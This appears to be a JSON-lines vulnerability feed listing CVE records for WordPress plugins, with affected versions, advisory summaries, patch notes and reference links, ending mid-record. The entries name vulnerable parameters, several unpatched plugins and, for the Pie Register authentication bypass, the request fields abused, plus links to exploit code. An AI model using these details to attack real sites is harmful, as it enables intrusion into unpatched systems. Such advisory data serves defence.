{"CVE_ID":"CVE-2024-1976","slug":"marketing-optimizer","versionImpact":"20200925","description":"The Marketing Optimizer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20200925. This is due to missing or incorrect nonce validation via the admin\/main-settings-page.php file. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b537637b-32c0-405e-94fa-c7c2d0c80658?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b537637b-32c0-405e-94fa-c7c2d0c80658?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/marketing-optimizer\\\/trunk\\\/admin\\\/main-settings-page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/marketing-optimizer\\\/trunk\\\/admin\\\/main-settings-page.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2474","slug":"standout-color-boxes-and-buttons","versionImpact":"0.7.0","description":"The Standout Color Boxes and Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'color-button' shortcode in all versions up to, and including, 0.7.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a826dff8-60ae-4e25-9d3e-be93f192aaca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a826dff8-60ae-4e25-9d3e-be93f192aaca?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/standout-color-boxes-and-buttons\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/standout-color-boxes-and-buttons\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37946","slug":"wp-recaptcha-integration","versionImpact":"1.2.5","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in weDevs ReCaptcha Integration for WordPress allows Stored XSS.This issue affects ReCaptcha Integration for WordPress: from n\/a through 1.2.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-recaptcha-integration\\\/wordpress-recaptcha-integration-for-wordpress-plugin-1-2-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-recaptcha-integration\\\/wordpress-recaptcha-integration-for-wordpress-plugin-1-2-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9456","slug":"wp-awesome-login","versionImpact":"0.4.0","description":"The WP Awesome Login plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 0.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0841127c-fe81-47b1-964f-15e006f618af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0841127c-fe81-47b1-964f-15e006f618af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-awesome-login\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-awesome-login\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-52408","slug":"push-notification-for-wp-by-pushassist","versionImpact":"3.0.8","description":"Unrestricted Upload of File with Dangerous Type vulnerability in Team PushAssist Push Notifications for WordPress by PushAssist allows Upload a Web Shell to a Web Server.This issue affects Push Notifications for WordPress by PushAssist: from n\/a through 3.0.8.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/push-notification-for-wp-by-pushassist\\\/wordpress-push-notifications-for-wordpress-by-pushassist-plugin-3-0-8-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/push-notification-for-wp-by-pushassist\\\/wordpress-push-notifications-for-wordpress-by-pushassist-plugin-3-0-8-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13444","slug":"wp-greet","versionImpact":"6.2","description":"The wp-greet plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-greet\\\/trunk\\\/wpg-admin.php#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-greet\\\/trunk\\\/wpg-admin.php#L124\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-greet\\\/trunk\\\/wpg-admin.php#L350\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-greet\\\/trunk\\\/wpg-admin.php#L350\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-greet\\\/trunk\\\/wpg-form.php#L253\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-greet\\\/trunk\\\/wpg-form.php#L253\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225035\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225035\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-greet\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-greet\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dafc40bf-833a-4d42-b9bc-c7cf2b234ef5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dafc40bf-833a-4d42-b9bc-c7cf2b234ef5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13751","slug":"3d-photo-gallery","versionImpact":"1.3","description":"The 3D Photo Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'des[]' parameter in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-photo-gallery\\\/tags\\\/1.3\\\/plugin.class.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-photo-gallery\\\/tags\\\/1.3\\\/plugin.class.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eae1c878-3df9-47af-8283-de3d5acb219a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eae1c878-3df9-47af-8283-de3d5acb219a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10804","slug":"fwduvp","versionImpact":"10.0","description":"The Ultimate Video Player WordPress & WooCommerce Plugin plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 10.0 via the content\/downloader.php file. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimate-video-player-wordpress-plugin\\\/8374433\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimate-video-player-wordpress-plugin\\\/8374433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5394abc6-836f-4b22-a7b6-79d092b93a7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5394abc6-836f-4b22-a7b6-79d092b93a7e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4578","slug":"file-provider","versionImpact":"1.2.3","description":"The File Provider WordPress plugin through 1.2.3 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3aa76b96-40b7-4bde-a39c-c1aa6f8278fc\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3aa76b96-40b7-4bde-a39c-c1aa6f8278fc\\\/\",\"refsource\":\"\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2025-8315","slug":"wp-easy-contact","versionImpact":"4.0.1","description":"The WP Easy Contact plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018noaccess_msg\u2019 parameter in all versions up to, and including, 4.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-easy-contact\\\/tags\\\/4.0.1\\\/includes\\\/emd-form-builder-lite\\\/emd-form-frontend.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-easy-contact\\\/tags\\\/4.0.1\\\/includes\\\/emd-form-builder-lite\\\/emd-form-frontend.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3337661\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3337661\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-easy-contact\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-easy-contact\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/229c88ea-c091-43b6-ac4d-31bccdd13a07?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/229c88ea-c091-43b6-ac4d-31bccdd13a07?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9451","slug":"embed-pdf-viewer","versionImpact":"2.4.4","description":"The Embed PDF Viewer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'height' and 'width' parameters in all versions up to, and including, 2.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b616e275-855d-461e-8fcb-c96098e41dfd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b616e275-855d-461e-8fcb-c96098e41dfd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-pdf-viewer\\\/trunk\\\/embed-pdf-viewer.php#L258\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-pdf-viewer\\\/trunk\\\/embed-pdf-viewer.php#L258\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-pdf-viewer\\\/trunk\\\/embed-pdf-viewer.php#L144\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-pdf-viewer\\\/trunk\\\/embed-pdf-viewer.php#L144\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-pdf-viewer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-pdf-viewer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164573\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164573\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-50496","slug":"ar-for-wordpress","versionImpact":"6.2","description":"Unrestricted Upload of File with Dangerous Type vulnerability in Web and Print Design AR For WordPress allows Upload a Web Shell to a Web Server.This issue affects AR For WordPress: from n\/a through 6.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ar-for-wordpress\\\/wordpress-ar-for-wordpress-plugin-6-2-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ar-for-wordpress\\\/wordpress-ar-for-wordpress-plugin-6-2-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11934","slug":"formaloo-form-builder","versionImpact":"2.1.3.2","description":"The Formaloo Form Maker & Customer Analytics for WordPress & WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018address\u2019 parameter in all versions up to, and including, 2.1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formaloo-form-builder\\\/trunk\\\/formaloo.php#L431\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formaloo-form-builder\\\/trunk\\\/formaloo.php#L431\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/formaloo-form-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/formaloo-form-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b7ddf44-a1d2-4042-9219-591ebc8e4250?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b7ddf44-a1d2-4042-9219-591ebc8e4250?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-34077","slug":"pie-register","description":"An authentication bypass vulnerability exists in the WordPress Pie Register plugin = 3.7.1.4 that allows unauthenticated attackers to impersonate arbitrary users by submitting a crafted POST request to the login endpoint. By setting social_site=true and manipulating the user_id_social_site parameter, an attacker can generate a valid WordPress session cookie for any user ID, including administrators. Once authenticated, the attacker may exploit plugin upload functionality to install a malicious plugin containing arbitrary PHP code, resulting in remote code execution on the underlying server.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/GTSolutions\\\/Pie-Register\",\"name\":\"https:\\\/\\\/github.com\\\/GTSolutions\\\/Pie-Register\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/rapid7\\\/metasploit-framework\\\/blob\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_pie_register_bypass_rce.rb\",\"name\":\"https:\\\/\\\/github.com\\\/rapid7\\\/metasploit-framework\\\/blob\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_pie_register_bypass_rce.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/pieregister.com\\\/\",\"name\":\"https:\\\/\\\/pieregister.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vulncheck.com\\\/advisories\\\/wordpress-pie-register-plugin-rce\",\"name\":\"https:\\\/\\\/vulncheck.com\\\/advisories\\\/wordpress-pie-register-plugin-rce\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pie-register\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pie-register\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/50395\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/50395\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8313","slug":"campus-directory","versionImpact":"1.9.1","description":"The Campus Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018noaccess_msg\u2019 parameter in all versions up to, and including, 1.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/campus-directory\\\/tags\\\/1.9.1\\\/includes\\\/emd-form-builder-lite\\\/emd-form-frontend.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/campus-directory\\\/tags\\\/1.9.1\\\/includes\\\/emd-form-builder-lite\\\/emd-form-frontend.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3337642\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3337642\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/campus-directory\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/campus-directory\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee031b29-a334-4df4-8c03-4ffd306e38ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee031b29-a334-4df4-8c03-4ffd306e38ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0152","slug":"wp-multi-store-locator","versionImpact":"2.4","description":"The WP Multi Store Locator WordPress plugin through 2.4 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8281fce2-6f24-4d3f-895f-4d8694806609\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8281fce2-6f24-4d3f-895f-4d8694806609\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2272","slug":"tiempocom","versionImpact":"0.1.2","description":"The Tiempo.com WordPress plugin through 0.1.2 does not sanitise and escape the page parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dba60216-2753-40b7-8f2b-6caeba684b2e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dba60216-2753-40b7-8f2b-6caeba684b2e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4999","slug":"horizontal-scrolling-announcement","versionImpact":"9.2","description":"The Horizontal scrolling announcement plugin for WordPress is vulnerable to SQL Injection via the plugin's [horizontal-scrolling] shortcode in versions up to, and including, 9.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf50922a-58a6-4ca4-80b7-cafb37b87216?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf50922a-58a6-4ca4-80b7-cafb37b87216?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scrolling-announcement\\\/trunk\\\/horizontal-scrolling-announcement.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scrolling-announcement\\\/trunk\\\/horizontal-scrolling-announcement.php#L79\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1859","slug":"slider-responsive-slideshow","versionImpact":"1.3.8","description":"The Slider Responsive Slideshow \u2013 Image slider, Gallery slideshow plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.8 via deserialization of untrusted input to the awl_slider_responsive_shortcode function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35266cd-41e6-4358-afaa-bc008962f2e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35266cd-41e6-4358-afaa-bc008962f2e1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3041884%40slider-responsive-slideshow&new=3041884%40slider-responsive-slideshow&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3041884%40slider-responsive-slideshow&new=3041884%40slider-responsive-slideshow&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3920","slug":"flattr","versionImpact":"1.2.2","description":"The Flattr WordPress plugin through 1.2.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2fb28c77-3c35-4a2f-91ed-823d0d011048\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2fb28c77-3c35-4a2f-91ed-823d0d011048\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9449","slug":"auto-iframe","versionImpact":"1.7","description":"The Auto iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tag' parameter in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a09dcc4-37ee-425d-b824-a593c22d711f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a09dcc4-37ee-425d-b824-a593c22d711f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-iframe\\\/trunk\\\/auto-iframe.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-iframe\\\/trunk\\\/auto-iframe.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auto-iframe\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auto-iframe\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-iframe\\\/trunk\\\/auto-iframe.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-iframe\\\/trunk\\\/auto-iframe.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164574\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164574\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11910","slug":"wp-crowdfunding","versionImpact":"2.1.12","description":"The WP Crowdfunding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wp-crowdfunding\/search block in all versions up to, and including, 2.1.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-crowdfunding\\\/trunk\\\/includes\\\/blocks\\\/Search.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-crowdfunding\\\/trunk\\\/includes\\\/blocks\\\/Search.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206336\\\/wp-crowdfunding\\\/trunk\\\/includes\\\/blocks\\\/Search.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206336\\\/wp-crowdfunding\\\/trunk\\\/includes\\\/blocks\\\/Search.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-crowdfunding\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-crowdfunding\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1541aaf-9f35-44b5-a985-1b8d33228f0a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1541aaf-9f35-44b5-a985-1b8d33228f0a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11899","slug":"slider-pro-lite","versionImpact":"1.4.1","description":"The Slider Pro Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sliderpro' shortcode in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 